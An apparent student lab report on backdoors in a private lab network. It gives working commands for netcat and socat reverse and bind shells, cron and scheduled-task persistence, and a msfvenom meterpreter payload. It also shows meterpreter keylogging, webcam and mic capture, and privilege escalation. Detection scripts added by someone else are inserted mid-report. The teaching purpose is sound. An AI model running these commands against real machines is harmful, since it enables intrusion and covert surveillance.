Table of Contents
First, experiment content and basic questions answered
Second, preparing the tools
- Viewing the Windows IP and the Linux IP
- Windows gets a Linux shell
- Linux gets a Windows shell
- Transferring data with nc
Third, the experimental process
- Use netcat to get a shell on the host, started by cron
- Use socat to get a shell on the host, started by a scheduled task
- Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, run it, and get a shell on the host
- Use MSF meterpreter (or other software) to capture audio, webcam images and keystrokes from the target host, and try privilege escalation
- Optional extra: use MSF to generate shellcode, inject it into pwn1 from Lab 1, and get a reverse-connection shell
Fourth, problems and reflections
First, experiment content and basic questions answered
1. Experiment content
(1) Use netcat to get a shell on the host, started by cron (0.5 points)
(2) Use socat to get a shell on the host, started by a scheduled task (0.5 points)
(3) Use MSF meterpreter (or other software) to generate an executable, transfer it to the host with ncat or socat, run it, and get a shell on the host (0.5 points)
(4) Use MSF meterpreter (or other software) to capture audio, webcam images and keystrokes from the target host, and try privilege escalation (2 points)
(5) Optional extra: use MSF to generate shellcode, inject it into pwn1 from Lab 1, and get a reverse-connection shell (1 point); write this up together with the rest of this experiment in the report.
2. Basic questions answered
(1) What possible ways for a backdoor to get into your system can you think of?
- Cracking a Linux account password
- Replacing the login program with one that accepts a special password and hides the login
- Hiding the backdoor in the file system
(2) Give examples of the ways you know a backdoor can start up (Windows and Linux)
- Linux: start the trojan on a timer through crontab, so the controller can periodically start the backdoor and keep watching its status; the backdoor can also be bound to a normal program, or opened by injected shellcode.
- Windows: the backdoor is received passively or downloaded, and starts when the victim clicks and runs the backdoor program.
(3) Which Meterpreter functions left a deep impression on you?
- Basic functions (basic connectivity, executing commands)
- Extended functions (such as collecting user information, installing services, and so on)
(4) How do you find out whether a backdoor has been installed on your own system?
- Install antivirus software for real-time protection.
- Check network connections: look for IPs that have established connections with the machine.
(5) The concept of a backdoor
A backdoor is a channel into a system that does not go through the normal authentication process.
Where do backdoors appear?
- The compiler leaves a backdoor
- The operating system leaves a backdoor
- Most commonly, of course, an application leaves a backdoor
- A dedicated backdoor lurking in the operating system, or disguised as a specific application.
Here are some examples from recent years:
- Compiler: the Apple Xcode backdoor incident (XcodeGhost). Apps caught with the backdoor included WeChat, NetEase Cloud Music, a travel app, 12306 and others, 76 apps in total, affecting hundreds of millions of users.
- Operating system: vendors vs. governments. Apple refused the FBI's demand to build in a backdoor. Those who did not refuse, of course, cannot say so.
- Operating system: an in-depth reading of the MS14-068 vulnerability: a backdoor planted by Microsoft? In fact I did not understand the details very well, but it looks quite suspicious.
- Firmware: more Cisco routers found with backdoors, four of them in China
- Application: researchers found a built-in backdoor in the macOS version of Skype
- Application: the bottom line of corporate ethics, seen from the Gustafsson "backdoor" incident
- Applications: how to assess the WormHole vulnerability that exposed a backdoor in many of Baidu's apps on its cloud platform?
A relatively narrow concept of a backdoor:
- Specifically, a program lurking in the operating system that is built to act as a backdoor
- The "bad guys" can connect to this program
- And execute all kinds of commands remotely
- The concept overlaps with trojans
- First, we need to have such a program
  - the netcat family
  - Meterpreter
  - Intersect
  - and many more...
- Second, get it into the system
  - Genuine software that was attacked, or that deliberately contains a backdoor
  - A genuine library file that contains a backdoor
  - Essentially tricking you into downloading and running it; this all belongs to phishing
    - An installer containing the backdoor, put online for download
    - Bound to a specific file, put online for download
    - A malicious program sent to you directly
    - A phishing link sent to you directly, pointing to a malicious website hosting a trojan
    - Picked up a USB stick, open a file to see what is on it?
    - A pretty girl or handsome guy hands you a USB stick and copies it to you directly
  - Attack a system vulnerability, gain control, then install the backdoor
- Third, make it run again after a reboot
  - Autostart techniques
    - Windows scheduled tasks
    - Linux cron
  - Disguise it as common software to entice users to click
  - Trojanize normal software
- Finally, avoid being found by the malicious-code detection programs on the machine
  - Malware anti-detection (AV evasion) techniques
  - Avoid being found by the firewall on the machine or on the network
    - Reverse (connect-back) connections
    - Encrypted connections
    - Tunneling
(6) Common backdoors
- netcat
  - Also known as nc or ncat
  - http://nc110.sourceforge.net/
  - http://netcat.sourceforge.net/
It is a low-level tool for basic TCP/UDP sending and receiving. It is often combined with other tools to play the role of a backdoor.
- Linux: netcat is generally preinstalled; run "man netcat" or "man nc" to see its usage instructions
- Windows: download ncat.rar from the course homepage attachments; extract it and it is ready to use!
Second, preparing the tools
1 Use netcat (nc) to obtain a remote host's shell
1.1 Windows gets a Linux shell
1. Windows opens a listener
- Use the `ipconfig` command to view the local IP, 192.168.157.1:
- Download ncat and enter its directory, press the Windows + R key combination to open cmd.exe, and enter the command `ncat.exe -l -p 5236`:
- Windows Firewall then raises an alert! To achieve the purpose of the experiment, the antivirus software and Windows Firewall on the computer are temporarily turned off here:
2. Linux connects back to Windows: enter the command `nc 192.168.157.1 5236 -e /bin/sh`:
3. Windows now has the Linux shell and can run any command, such as ls:
1.2 Linux gets a Windows shell
1. Use the `ifconfig` command to view the local IP, 192.168.157.132:
2. Linux runs the listener: enter the command `nc -l -p 5236`
3. Windows connects back to Linux: in the ncat directory, enter the command `ncat.exe -e cmd.exe 192.168.157.132 5236`:
4. Linux sees the Windows command prompt
5. You can happily view and manipulate files on Windows, ha ha ha!
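The connect-backs above (question (4) suggests checking network connections to find them) leave a shell process whose standard input and output are the TCP socket itself, which `ss -tnp` exposes as fd 0/1/2 in its Process column. The Python below, an added defender-side example that is not part of the original report, parses such output and flags those connections; the sample lines, PIDs and the 93.184.216.34 peer are constructed.

```python
import re

# Constructed sample of `ss -tnp` output (not from the original report):
# an ssh session, a browser connection, and a shell whose fd 0/1/2 are a
# TCP socket to the listener, as left behind by `nc ... -e /bin/sh`.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port     Peer Address:Port   Process
ESTAB  0      0      192.168.157.132:22     192.168.157.1:52104 users:(("sshd",pid=912,fd=4))
ESTAB  0      0      192.168.157.132:41022  93.184.216.34:443   users:(("firefox",pid=1340,fd=57))
ESTAB  0      0      192.168.157.132:45678  192.168.157.1:5236  users:(("sh",pid=2431,fd=0),("sh",pid=2431,fd=1),("sh",pid=2431,fd=2))
"""

# Interactive shells that should never have a network socket as stdin/stdout/stderr.
SHELLS = {"sh", "bash", "dash", "zsh"}
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+),fd=(\d+)\)')


def parse_ss_line(line):
    """Return (local, peer, [(name, pid, fd), ...]) for an ESTAB line, else None."""
    fields = line.split()
    if len(fields) < 5 or fields[0] != "ESTAB":
        return None  # header line or a socket that is not established
    procs = [(name, int(pid), int(fd)) for name, pid, fd in PROC_RE.findall(line)]
    return fields[3], fields[4], procs


def find_socket_shells(ss_output):
    """Flag established connections where a shell holds the socket as fd 0, 1 or 2."""
    findings = []
    for line in ss_output.splitlines():
        parsed = parse_ss_line(line)
        if parsed is None:
            continue
        local, peer, procs = parsed
        for name, pid, fd in procs:
            if name in SHELLS and fd in (0, 1, 2):
                findings.append({"pid": pid, "shell": name, "local": local, "peer": peer})
                break  # report each connection once
    return findings


if __name__ == "__main__":
    for f in find_socket_shells(SAMPLE_SS_OUTPUT):
        print(f"[!] pid {f['pid']} ({f['shell']}) stdio is the socket {f['local']} -> {f['peer']}")
```

On a live system, feed it `subprocess.run(["ss", "-tnp"], capture_output=True, text=True).stdout` instead of the constructed sample.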
2 Transferring data with nc
- The command format for transferring a file with nc is as follows:
  The destination host listens:
  `nc -l <listening port> > <file name to receive>`
  The source host initiates the request:
  `nc <destination host IP> <destination port> < <file name to send>`
- The English man page describes it as follows:
  Start by using nc to listen on a specific port, with output captured into a file:
  $ nc -l 1234 > filename.out
  Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred:
  $ nc host.example.com 1234 < filename.in
  After the file has been transferred, the connection will close automatically.
- Windows listens on port 5224
- Kali connects to Windows port 5224
- The data-transfer connection is established
Third, the experimental process
Use netcat to get a shell on the host, started by cron
- Windows listens on port 5236
- In Kali, use `crontab -e` to edit the scheduled tasks and select editor 3
- Add a line at the end: `24 * * * * /bin/netcat 192.168.157.1 5236 -e /bin/sh`, which means: at minute 24 of every hour, connect back to port 5236 on the Windows host
- When the time reaches 22:24, the Kali shell has been obtained in Windows and commands can be entered
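The crontab line above is also what a defender would look for when auditing `crontab -l` output. The Python below is an added example, not part of the original report: it splits crontab lines into schedule and command (skipping comments, `VAR=` lines and handling `@reboot`-style schedules) and flags jobs that run a network tool with a shell handed to it. The sample crontab is constructed around the page's own line.

```python
import re

# Constructed crontab (not from the original report): two ordinary jobs plus the
# connect-back line that the section above adds with `crontab -e`.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/bash
0 3 * * * /usr/bin/apt-get update
*/15 * * * * /home/kali/bin/backup.sh >> /var/log/backup.log 2>&1
24 * * * * /bin/netcat 192.168.157.1 5236 -e /bin/sh
"""

CRON_FIELDS = 5
# A job becomes a remote shell when a network tool is told to run a shell.
NET_TOOL_RE = re.compile(r"(^|/|\s)(nc|netcat|ncat|socat)(\s|$)")
SHELL_HANDOFF_RE = re.compile(r"(-e\s+\S*sh\b|-c\s+\S*sh\b|exec:\S*(sh|cmd)|/dev/tcp/)")
ENDPOINT_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})\s+(\d{1,5})\b")


def split_cron_line(line):
    """Return (schedule, command) for a job line; None for blank, comment or VAR= lines."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    nfields = 1 if line.startswith("@") else CRON_FIELDS  # @reboot etc. use one field
    parts = line.split(None, nfields)
    if len(parts) <= nfields:
        return None  # malformed: a schedule with no command
    return " ".join(parts[:nfields]), parts[nfields]


def audit_crontab(text):
    """Flag jobs that run a network tool and hand it a shell; one dict per hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        job = split_cron_line(line)
        if job is None:
            continue
        schedule, command = job
        if NET_TOOL_RE.search(command) and SHELL_HANDOFF_RE.search(command):
            m = ENDPOINT_RE.search(command)  # remote IP and port, if written as "ip port"
            findings.append({
                "line": lineno,
                "schedule": schedule,
                "command": command,
                "remote": f"{m.group(1)}:{m.group(2)}" if m else None,
            })
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"[!] line {f['line']}: '{f['schedule']}' runs a shell to {f['remote']}: {f['command']}")
```

Run it over every user's crontab and over /etc/crontab and /etc/cron.d/* (the latter have an extra user field, so shift `CRON_FIELDS` to 6 for those files).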
Use socat to get a shell on the host, started by a scheduled task
socat
netcat++, the super netcat tool.
Don't believe it? Look up the README.
For the Windows version, see the attachment. Unzip it and use it; no installation needed.
Any proxying, forwarding or similar function can be implemented with this tool.
- Use the `man socat` command to view the introduction and usage of socat: DESCRIPTION
**Socat** is a command line based utility that establishes two bidirectional byte streams and transfers data between them. Because the streams can be constructed from a large set of different types of data sinks and sources (see address types), and because lots of address options may be applied to the streams, socat can be used for many different purposes.
**Filan** is a utility that prints information about its active file descriptors to stdout. It has been written for debugging **socat**, but might be useful for other purposes too. Use the -h option to find more infos.
**Procan** is a utility that prints information about process parameters to stdout. It has been written to better understand some UNIX process properties and for debugging **socat**, but might be useful for other purposes too.
The life cycle of a **socat** instance typically consists of four phases.
In the init phase, the command line options are parsed and logging is initialized.
During the open phase, **socat** opens the first address and afterwards the second address. These steps are usually blocking; thus, especially for complex address types like socks, connection requests or authentication dialogs must be completed before the next step is started.
In the transfer phase, **socat** watches both streams' read and write file descriptors via select(), and, when data is available on one side and can be written to the other side, socat reads it, performs newline character conversions if required, and writes the data to the write file descriptor of the other stream, then continues waiting for more data in both directions.
When one of the streams effectively reaches EOF, the closing phase begins. **Socat** transfers the EOF condition to the other stream, i.e. tries to shutdown only its write stream, giving it a chance to terminate gracefully. For a defined time socat continues to transfer data in the other direction, but then closes all remaining channels and terminates.
- On Windows 10, right-click the Windows icon at the bottom left of the screen and select "Computer Management" (or simply search for "Computer Management")
- Create a task in Task Scheduler and fill in the task name
- Click the "Triggers" tab, select "New", and set "Begin the task" to "On workstation lock":
- Click the "Actions" tab, click "New", under "Program/script" select the path to `socat.exe`, and in the "Add arguments" field write `tcp-listen:5236 exec:cmd.exe,pty,stderr` (this binds `cmd.exe` to port 5236 and redirects cmd.exe's stderr to stdout); click "OK" to save the settings:
- Once created, the task shows as Ready. Press the Windows + L shortcut to lock the computer; after unlocking, find the task you created and double-click it, and you can see the task has started running
- At this point, in the Kali environment enter the command `socat - tcp:192.168.157.1:5236`; the first argument `-` represents standard input and output, and the second stream connects to port 5236 on the Windows host. You can see that a cmd shell has been successfully obtained
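A scheduled task like the one created above is exported by `schtasks /Query /TN <name> /XML` in the Task Scheduler XML format, which is what a defender audits for bind-shell actions. The Python below is an added example, not part of the original report: it parses the task's trigger types and Exec actions and flags a network tool that listens on a port and serves a shell. The XML sample, the socat.exe path and the task layout are constructed assumptions.

```python
import ntpath
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task export (not from the original report): the lock-screen trigger
# and the socat action described in the section above; the path is an assumption.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <SessionStateChangeTrigger><StateChange>SessionLock</StateChange></SessionStateChangeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\student\Desktop\socat\socat.exe</Command>
      <Arguments>tcp-listen:5236 exec:cmd.exe,pty,stderr</Arguments>
    </Exec>
  </Actions>
</Task>"""

BIND_TOOLS = {"socat", "nc", "ncat", "netcat"}
LISTEN_RE = re.compile(r"\b(tcp|tcp4|tcp6|udp|openssl)-listen:(\d{1,5})", re.I)
SHELL_RE = re.compile(r"exec:\S*(cmd|powershell|sh)", re.I)


def parse_task_xml(xml_text):
    """Return (trigger tag names, [(command, arguments), ...]) for one task."""
    root = ET.fromstring(xml_text)
    trig = root.find("t:Triggers", NS)
    triggers = [t.tag.split("}")[-1] for t in trig] if trig is not None else []
    actions = []
    for ex in root.iterfind("t:Actions/t:Exec", NS):
        command = (ex.findtext("t:Command", "", NS) or "").strip()
        arguments = (ex.findtext("t:Arguments", "", NS) or "").strip()
        actions.append((command, arguments))
    return triggers, actions


def audit_task(xml_text):
    """Flag Exec actions where a network tool listens on a port and hands out a shell."""
    triggers, actions = parse_task_xml(xml_text)
    findings = []
    for command, arguments in actions:
        exe = ntpath.basename(command).lower()  # ntpath handles Windows paths on any OS
        tool = exe[:-4] if exe.endswith(".exe") else exe
        listen = LISTEN_RE.search(arguments)
        if tool in BIND_TOOLS and listen and SHELL_RE.search(arguments):
            findings.append({"exe": exe, "port": int(listen.group(2)),
                             "triggers": triggers, "arguments": arguments})
    return findings


if __name__ == "__main__":
    for f in audit_task(SAMPLE_TASK_XML):
        print(f"[!] {f['exe']} listens on {f['port']} and serves a shell; triggers: {f['triggers']}")
```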
Use MSF meterpreter to generate an executable, transfer it to the host with ncat or socat, run it, and get a shell on the host
Meterpreter
- Is a backdoor program.
- The traditional understanding is: someone writes a backdoor, and we make use of it.
- Later, some experts wanted to write a platform for generating backdoors. The platform makes the backdoor's basic functions (basic connection, executing commands), extended functions (such as collecting user information, installing services, and so on), encoding mode, runtime platform and run-time parameters partly or wholly adjustable. Combine them as needed and you can generate an executable file.
Typical platforms include:
- Intersect
- Metasploit's msfvenom command
- Veil-Evasion
Next we learn how to use msfvenom to generate a backdoor executable. The backdoor we want to generate is Meterpreter.
"Unveiling the mystery of Meterpreter" describes some of the underlying principles of Meterpreter ???.
- Enter the command `msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.182.128 LPORT=5224 -f exe > 20175224_backdoor.exe` to generate the backdoor
Note: the IP address is the Linux IP
Parameter description:
-p the payload to use. "Payload" means the thing being carried. Here windows/meterpreter/reverse_tcp is a piece of shellcode
-x the executable template to use; the payload (shellcode) is written into this executable
-e the encoder to use, which transforms the shellcode in order to evade antivirus
-i the number of encoder iterations, i.e. how many times to encode with the encoder, e.g. 5
-b badchars, characters that must be removed from the payload
LHOST the IP to connect back to
LPORT the port to connect back to
-f the output file format
> the output file to write to
Of course, the generated file needs to be copied to Windows with ncat (most likely the antivirus software will raise an alert and delete the file, because it is after all a backdoor. So to verify the function, you can temporarily turn off the antivirus for a while. Anti-AV evasion will be covered later; once the backdoor has been made to evade detection, the antivirus will not find it)
- Windows enters receiving mode: `ncat.exe -lv 5236 > 20175236_backdoor.exe`
- Linux executes `nc 192.168.157.1 5236 < 20175236_backdoor.exe`
Note: close the antivirus software; the IP address is that of the Windows host
- The file is transmitted and received successfully
- Open a terminal in Kali and enter the `msfconsole` command to enter the msf console
- Enter `use exploit/multi/handler` to enter the listener module
- Enter `set payload windows/meterpreter/reverse_tcp` to set the payload
- Enter `set LHOST 192.168.182.128` and `set LPORT 5224` in turn to set the IP and port. Note that the IP specified here is the Linux IP, the same IP used when generating the backdoor
- Setup is complete; start listening with `exploit`
- Run the backdoor under Windows
- Kali has received the connection from the Windows host and obtained a shell for remote control
Notes:
- LHOST must match the one used in the step that generated backdoor.exe, i.e. in this example 192.168.157.132;
- LPORT must also match the one used in the previous step to generate backdoor.exe, i.e. 5236;
- The payload must match, i.e. windows/meterpreter/reverse_tcp.
Use MSF meterpreter to capture audio, webcam images and keystrokes from the target host
- The `record_mic` command can capture a piece of audio
- The `webcam_snap` command can take a picture with the camera (I am ugly, and I had not stuck anything over the lens)
- The `screenshot` command can take screenshots (I forgot to screenshot the command being typed, but you can see the generated screenshot file)
- Use the `keyscan_start` command to start recording keystrokes, and the `keyscan_dump` command to read the recorded keystrokes
- First use the `getuid` command to view the current user, then use the `getsystem` command to escalate privileges
Optional extra: use MSF to generate shellcode, inject it into pwn1 from Lab 1, and get a reverse-connection shell
- Use the command `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.157.132 LPORT=5236 -x /root/Desktop/20175224/exp2/pwn1 -f elf > 5236pwn` to generate the shellcode file 5236pwn in ELF format, using pwn1 as the template
- Enter the command `msfconsole` to enter the msf command line
- Run the backdoor file 5236pwn on Kali; when running pwn2 in Kali, first grant execute permission: `chmod +x 5236pwn`
- At this point the attacking Linux host has received the connection and obtained a shell for remote control
Fourth, problems and reflections
I feel this experiment was not particularly difficult. Compared with the first experiment, I was much more familiar with the environment, so it was relatively easy to do; it is just that there have been many study tasks recently and they were a bit scattered, and unreasonable time allocation lowered the quality of the lab report. But overall this experiment can be summed up in four words: really fun! I felt that setting up a backdoor connection is so simple yet so powerful in function, and the process was still quite rewarding. Of course, I also learned some other things from CSDN, for example that Meterpreter is far more than the single thing I thought it was; referring to someone else's blog on CSDN, I learned some other Meterpreter-related knowledge:
Use the help command to view Meterpreter's basic functions:
Get a Windows command-line interface, convenient for executing Windows built-in commands; exit to quit. Get a Ruby interface; exit to quit. If you are capable, you can even program directly in Ruby (PS: I can't, so I won't say more)
It is said that you can call any Windows API. Refer to Chapter 9 of "Metasploit Devil Training Camp"; there is a small example.
There are many things to learn; "confidentiality is no small matter"! Through this hands-on exercise I understood more about how low some systems' ability to resist intrusion is; the fact that such a simple backdoor works is shocking, and this has indirectly raised my security awareness.